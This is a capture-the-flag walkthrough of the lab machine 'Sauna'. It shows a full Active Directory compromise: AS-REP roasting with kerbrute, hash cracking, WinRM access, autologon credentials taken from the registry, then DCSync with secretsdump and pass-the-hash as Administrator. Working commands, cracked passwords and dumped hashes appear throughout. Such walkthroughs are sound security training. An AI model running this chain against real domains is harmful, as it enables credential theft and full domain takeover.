Overview
The machine starts by LDAP null bind enumeration and website OSINT that reveals staff names to build a username list, using kerbrute with downgraded encryption we find fsmith is vulnerable to AS-REP roasting and crack the hash to get winrm access, then winPEAS reveals autologon credentials for svc_loanmgr stored in the registry, that account has DCSync rights so we dump domain hashes and pass-the-hash as Administrator to get root.
Enumeration
as usual we'll start with nmap scan
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.95.180
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-08 23:57 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating Ping Scan at 23:57
Scanning 10.129.95.180 [2 ports]
Completed Ping Scan at 23:57, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:57
Completed Parallel DNS resolution of 1 host. at 23:57, 0.10s elapsed
Initiating Connect Scan at 23:57
Scanning 10.129.95.180 [1000 ports]
Discovered open port 139/tcp on 10.129.95.180
Discovered open port 135/tcp on 10.129.95.180
Discovered open port 80/tcp on 10.129.95.180
Discovered open port 53/tcp on 10.129.95.180
Discovered open port 445/tcp on 10.129.95.180
Discovered open port 88/tcp on 10.129.95.180
Discovered open port 3268/tcp on 10.129.95.180
Discovered open port 636/tcp on 10.129.95.180
Discovered open port 389/tcp on 10.129.95.180
Discovered open port 464/tcp on 10.129.95.180
Discovered open port 593/tcp on 10.129.95.180
Discovered open port 3269/tcp on 10.129.95.180
Completed Connect Scan at 23:57, 7.78s elapsed (1000 total ports)
Initiating Service scan at 23:57
Scanning 12 services on 10.129.95.180
Completed Service scan at 23:57, 15.25s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.95.180.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:57
Stats: 0:00:38 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.94% done; ETC: 23:58 (0:00:00 remaining)
Completed NSE at 23:58, 40.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 4.10s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
Nmap scan report for 10.129.95.180
Host is up, received syn-ack (0.11s latency).
Scanned at 2026-06-08 23:57:24 PDT for 67s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| _http-server-header: Microsoft-IIS/10.0
| _http-title: Egotistical Bank :: Home
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
| _ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-09 13:57:40Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 38495/tcp): CLEAN (Timeout)
| Check 2 (port 47005/tcp): CLEAN (Timeout)
| Check 3 (port 10224/udp): CLEAN (Timeout)
| Check 4 (port 63831/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| _clock-skew: 7h00m00s
| smb2-time:
| date: 2026-06-09T13:57:52
| _ start_date: N/A
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.30 secondsand we've got active directory environment with the domain name EGOTISTICAL-BANL.LOCAL and a big clock skew if we are gonna deal with Kerberos
so setup the environment and move on
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ echo '10.129.95.180 EGOTISTICAL-BANK.LOCAL' | sudo tee -a /etc/hosts
10.129.95.180 EGOTISTICAL-BANK.LOCAL
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ sudo ntpdate EGOTISTICAL-BANK.LOCAL
2026-06-09 07:02:18.965036 (-0700) +25201.171696 +/- 0.037343 EGOTISTICAL-BANK.LOCAL 10.129.95.180 s1 no-leap
CLOCK: time stepped by 25201.171696
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u '' -p '' --generate-krb5-file krb5.conf
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [+] krb5 conf saved to: krb5.conf
SMB 10.129.95.180 445 SAUNA [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ sudo mv krb5.conf /etc/krb5.confGuest and Null bind
so I always start with listing shares accessible by the Guest user but the account is disabled in this case
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u 'Guest' -p '' --shares
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True)
(SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Guest: STATUS_ACCOUNT_DISABLEDso i tried also the null bind with ldap and it is valid but trying to list the users returned nothing
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc ldap 10.129.95.180 -u '' -p ''
LDAP 10.129.95.180 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:None) (cha
nnel binding:No TLS cert)
LDAP 10.129.95.180 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc ldap 10.129.95.180 -u '' -p '' --users
LDAP 10.129.95.180 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:None) (cha
nnel binding:No TLS cert)
LDAP 10.129.95.180 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
LDAP 10.129.95.180 389 SAUNA [*] Enumerated 0 domain users: EGOTISTICAL-BANK.LOCAL
LDAP 10.129.95.180 389 SAUNA -Username- -Last PW Set- -BadPW- -Description-Usually this is weird but I had a case like this lately and this was because some users wasn't in the user container and it was in a custom OU or maybe we got read restriction so lets use ldapsearch to list all objects and try to make sense of it
i will use the root as the search base and all objects for the class ldapsearch -H ldap://10.129.95.180 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" "(objectClass=*)"
and this is a SNIP of the output and the only thing that looks like a user here is this Hugo Smith user so lets do some enumeration about it
# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCALand even though the null bind is valid we got restricted read access but I guess the user should be enough lets look if it doesn't require pre-auth
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ ldapsearch -H ldap://10.129.95.180 -x -b "CN=Hugo Smith,dc=EGOTISTICAL-BANK,dc=LOCAL" "*"
# extended LDIF
#
# LDAPv3
# base <CN=Hugo Smith,dc=EGOTISTICAL-BANK,dc=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: *
#
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1I created a list of possible usernames using Hugo's name cause I don't know the domain naming convention
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ username-anarchy Hugo Smith
hugo
hugosmith
hugo.smith
hugosmit
hugos
h.smith
hsmith
shugo
s.hugo
smithh
smith
smith.h
smith.hugo
hsusing that list we got the username hsmith is valid but it isn't vulnerable to AS-REP roasting
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --downgrade --dc 10.129.95.180 hugo.usernames
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 06/09/26 - Ronnie Flathers @ropnop
2026/06/09 07:23:34 > Using downgraded encryption: arcfour-hmac-md5
2026/06/09 07:23:34 > Using KDC(s):
2026/06/09 07:23:34 > 10.129.95.180:88
2026/06/09 07:23:34 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2026/06/09 07:23:34 > Done! Tested 14 usernames (1 valid) in 0.436 secondsSo we pretty much got nothing for now except this username and it would be very hard to brute-force the password as It will take too much time and I don't think this is the intended path
Website
I almost missed this in the nmap results cause we got HTTP port exposed that I thought it was IIS default page but looking back at it, it got an HTTP title for the bank so lets take a look
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACELooking at it, it is a static website but this about.html page leaks some possible usernames other than hsmith but now at least we know the naming convention is flast for username-anarchy so lets add those to a file and create a list of their possible usernames
the command for it looks like this and you can check the help for more cool stuff
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ username-anarchy --input-file ./staff.txt --select-format flast
fsmith
scoins
hbear
btylor
sdriver
skerband we got one more valid username but this time it is vulnerable to AS-REP roast, just so you know we used --downgrade to downgrade the encryption type from etype18 to etype23 which is HMAC-RC4 which is just md5 meaning it'll be easier to crack but if we didn't use we would get AES-128 or AES-256 based on what's being configured on the DC
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --downgrade --dc 10.129.95.180 usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 06/09/26 - Ronnie Flathers @ropnop
2026/06/09 07:32:12 > Using downgraded encryption: arcfour-hmac-md5
2026/06/09 07:32:12 > Using KDC(s):
2026/06/09 07:32:12 > 10.129.95.180:88
2026/06/09 07:32:12 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c70f1a164cacf53deee90fec84d355c2$3f742bb7635f6519cc259475fbf9212e63b16e9b01163ee98f2592fc89d16cefccc7ad31e9da7c1f02eff29cf018398479f1be73f8d76bcf3417d8385b8d108a474946a0fecf73c1435699f84aedc8bfc6cec4c8523977ed615aa8c5c9b141f112939e291a2aeb7616c3d250f4af9fc037c239821b12162867c506e57c6876ee2254abd2416cfebf3967ae49bd7c97b5034c86db01dddd3df26e3a2bf59ec934929ffef41645fa979054fe691e5a2d5254a9b0ac91ed30fe35c54959e54ce475c468f2152d5f16bd6eba3c3f538ec44265ffbd32ae699d733f68e4dcd22f690d1957f6c066f973cdcde765ebf567e8f0296ec9e514bd377b587e2cec16ad08d7
2026/06/09 07:32:12 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCALand you can find it here it is etype18 which will be kinda impossible to crack
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.129.95.180 usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 06/09/26 - Ronnie Flathers @ropnop
2026/06/09 07:32:58 > Using KDC(s):
2026/06/09 07:32:58 > 10.129.95.180:88
2026/06/09 07:32:58 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:f72e72093ac843cd3bbb4b00151f90bd$e6110acf09a061b118ef013cbbda89251a10fb1c5b4a12ab87f5bbf9204130d1c3fd8da9790ae301ba980812790d291f72455bfab01415efb68f573fbe415724581b91b59b16b6098afcbfc867ae67af0bc5223858c51cc04b04aca4e18e3b56aad4eb4e4592f0636c1f86850e759ac7dd53bd4166ac645d4c79a2b44f8c2f195ffa1798af70d066da103f44269dd20b134b6e8ef83285ffdb4923f9d0d7bacadf6c98ec7172d3f6fb1216293df0026147abc769de780ddd8b4e69b11531c0b0e6e206afe0ed024e9a1eceb36f5ae97de19a11133582706cdf8f229bd5b4c1e6ac1cf7cacb761f390a1b519285cf073bcd028e20dd4b5072afae74f8758748889202f1cbbeb6bd91bac63d568683bdc466748591af50
2026/06/09 07:32:58 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2026/06/09 07:32:58 > Done! Tested 6 usernames (1 valid) in 0.243 secondsLast thing to prove my point here lok at this, the type is 18 but hashcat usually expects it to be etype23 cause it is easier to crack and we can change the mode explicitly but it'll waste time
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:ed83c8b...8873e1
Time.Started.....: Tue Jun 9 07:35:38 2026 (22 secs)
Time.Estimated...: Tue Jun 9 07:36:00 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 673.4 kH/s (2.26ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: kristenanne -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Util: 89%but the etype got crack and we got a password for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:cd7487fab51e2e9ad69467c41ea0b77d$9d7827aba331b7cf0100352d62bbafdb21ac308ce20f3cea3f2e4992d9ad544e5416889c1aeab953e844f0a25e8f32203495d009d15dd3ab
19fd4904455146254be8fa4e0556bb1a4066ef69f31a47067d09475e19782b0bc4f4dfc5b2b3c4902e7f17b23a23a3c8a348f3cab76f922630cc77afa17cdc3889bbc12e070c4134ce228241e74647ec612c0d9e29da4b8ca101fc2a90a1a
a73a008f754409ff93463802867f122b9ae592785356a26e21094e4fdc5e76663f4b9bfa84dc33c4e8fd041979af99ebf36514d90e3113f6990b123b43cbe31727c215f436219243746f9cf6e67da99d3eb359712930b6684abd0199ba0d7
bada606b7f52e7128d9ca9:Thestrokes23
Approaching final keyspace - workload adjusted.Shell as fsmith
and we got it working for smb and there is a share that we can write to
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u fsmith -p Thestrokes23 --shares
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
SMB 10.129.95.180 445 SAUNA [*] Enumerated shares
SMB 10.129.95.180 445 SAUNA Share Permissions Remark
SMB 10.129.95.180 445 SAUNA ----- ----------- ------
SMB 10.129.95.180 445 SAUNA ADMIN$ Remote Admin
SMB 10.129.95.180 445 SAUNA C$ Default share
SMB 10.129.95.180 445 SAUNA IPC$ READ Remote IPC
SMB 10.129.95.180 445 SAUNA NETLOGON READ Logon server share
SMB 10.129.95.180 445 SAUNA print$ READ Printer Drivers
SMB 10.129.95.180 445 SAUNA RICOH Aficio SP 8300DN PCL 6 WRITE We cant print money
SMB 10.129.95.180 445 SAUNA SYSVOL READ Logon server sharebut we also can access WINRM so lets get a shell
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc winrm 10.129.95.180 -u fsmith -p Thestrokes23
WINRM 10.129.95.180 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM 10.129.95.180 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)and we got user
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ winrmexec EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23@10.129.95.180
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using 10.129.95.180
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.95.180:5985/wsman
PS C:\Users\FSmith\Documents> cat ../Desktop/user.txt
0efd2e511c26676e9e3274b5c2f771b7
PS C:\Users\FSmith\Documents>the privileges and groups for this user are fine so lets try to see if we got permission over any user in the domain
PS C:\Users\FSmith\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\FSmith\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448I've got bloodhound up and running but nothing came back, it was just a normal user with no outbound objects so I am back to the shell to run winPeas
AutoLogon
Windows Autologon passwords are ==stored credentials used by the operating system to automatically log into a specific user account during startup==. This feature bypasses the standard login screen to provide convenience for kiosks, public displays, and shared lab computers
and after running winPEAS it returned an autologon password for a user
ÉÍÍÍÍÍÍÍÍÍ͹ Home folders found (T1083)
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\FSmith : FSmith [Allow: AllAccess]
C:\Users\Public
C:\Users\svc_loanmgr
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials (T1552.002)
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!trying to login got failure cause the username isn't as it appears in winPEAS results
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u svc_loanmanager -p Moneymakestheworldgoround!
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\svc_loanmanager:Moneymakestheworldgoround! STATUS_LOGON_FAILUREwhen i went back to bloodhound I found out that the user SVC_LOANMGR got DCSync rights so lets try this username instead
and it is valid credentials for this user
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u svc_loanmgr -p Moneymakestheworldgoround!
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!A DCSync attack is a post-exploitation technique used by threat actors to steal sensitive credentials directly from an organization's Active Directory (AD). It works by tricking a legitimate Domain Controller into believing the attacker's machine is another Domain Controller requesting a data sync
so lets dump secrets and use administrator hash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.129.95.180
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:1119509eab6a39c955d23b5ce973aa62:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:cf50494e641a40faf3f587a5dc79d8492c161192ce866503aa2f0c4ed682d9b9
SAUNA$:aes128-cts-hmac-sha1-96:f5d2bcad4e4ae43f0b1f78b196cd6f63
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...and we got root
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ winrmexec EGOTISTICAL-BANK.LOCAL/administrator:@10.129.95.180 -hashes :823452073d75b9d1cf70ebdf86c7f98e
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using 10.129.95.180
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.95.180:5985/wsman
PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
287a09705351b7b12056d70fc6c4aa57
PS C:\Users\Administrator\Documents>Beyond root
you also could've read the Password through the registry yourself if you can't upload a tool in more restricted environment then you can get a list of users using fsmith creds and password spray like this
PS C:\Users\FSmith\Documents> Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
AutoRestartShell : 1
Background : 0 0 0
CachedLogonsCount : 10
DebugServerCommand : no
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DisableBackButton : 1
EnableSIHostIntegration : 1
ForceUnlockLogon : 0
LegalNoticeCaption :
LegalNoticeText :
PasswordExpiryWarning : 5
PowerdownAfterShutdown : 0
PreCreateKnownFolders : {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk : 1
Shell : explorer.exe
ShellCritical : 0
ShellInfrastructure : sihost.exe
SiHostCritical : 0
SiHostReadyTimeOut : 0
SiHostRestartCountLimit : 0
SiHostRestartTimeGap : 0
Userinit : C:\Windows\system32\userinit.exe,
